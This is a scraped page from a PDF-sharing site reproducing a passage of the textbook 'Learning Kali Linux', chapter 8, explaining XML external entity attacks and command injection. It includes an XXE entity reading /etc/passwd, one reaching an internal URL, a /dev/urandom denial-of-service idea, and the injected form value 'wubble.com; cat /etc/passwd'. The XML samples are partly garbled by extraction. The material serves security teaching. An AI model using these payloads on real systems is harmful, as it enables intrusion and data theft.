• Command Injection
    		•

    | Chapter 8: Web Application Testing




    Download 22,59 Mb.
    Pdf ko'rish
    bet222/225
    Sana14.05.2024
    Hajmi22,59 Mb.
    #232856
    1   ...   217   218   219   220   221   222   223   224   225
    Bog'liq
    learningkalilinux

    248 | Chapter 8: Web Application Testing

    Example 8-1. XML external entity sample
    version
    =
    "1.0"
    encoding
    =
    "ISO-8859-1"
    ?>
    [
    "file:///etc/passwd"
    >
    ]
    >
    &xxe;
    The external entity is referenced as 
    xxe
    , and in this case, it’s a call to the SYSTEM
    looking for a file. Of course, the 
    /etc/passwd
    file will give you only a list of users. You
    won’t get password hashes from it, though the web server user probably doesn’t have
    access to the 
    /etc/shadow
    file. This isn’t the only thing you can do with an XML injec‐
    tion attack, though. Instead of a reference to a file, you could open a remote URL.
    This could allow an outside-facing server to provide content from a server that is
    only on the inside of the network. The XML would look similar except for
    the 
    !ENTITY
    line. 
    Example 8-2
    shows the 
    !ENTITY
    line referring to a web server with
    a private address that would not be routable over the internet.
    Example 8-2. XML external entity for internal URL
    "https://192.168.1.1/private"
    >
    ]
    >
    One other attack that could be used with this is to refer to a file that would never
    close. On a Unix-like operating system, you could refer to something like 
    /dev/uran‐
    dom
    , which would never have an end-of-file marker because it just keeps sending
    random values. There are other, similar, pseudodevices on Linux and other Unix-like
    operating systems. If this type of attack were used, the web server or the application
    may stop functioning properly, causing a denial of service.
    Command Injection
    Command injection
    attacks target the operating system of the web server. With this
    type of attack, someone could take advantage of a form field that is used to pass
    something to the operating system. If you have a web page that has some sort of con‐
    trol of the underlying device or offers up some sort of service (for example, doing a
    whois
    lookup), you may be able to send in an operating system command. Theoreti‐
    cally, if you had a page that used the 
    whois
    command from the operating system, the
    language the application was written in would do something like a 
    system()
    call, pass‐
    ing in 
    whois
    followed by what should be a domain name or IP address.
    With this sort of attack, it’s helpful to know the underlying operating system so you
    can pass in appropriate commands and use the right command delimiter. Let’s
    assume that it’s a Linux system. Linux uses ; (semicolon) as a command delimiter. So,
    we could do something like passing in 
    “wubble.com; cat /etc/passwd”
    to the form field.

    Download 22,59 Mb.
    1   ...   217   218   219   220   221   222   223   224   225




    Download 22,59 Mb.
    Pdf ko'rish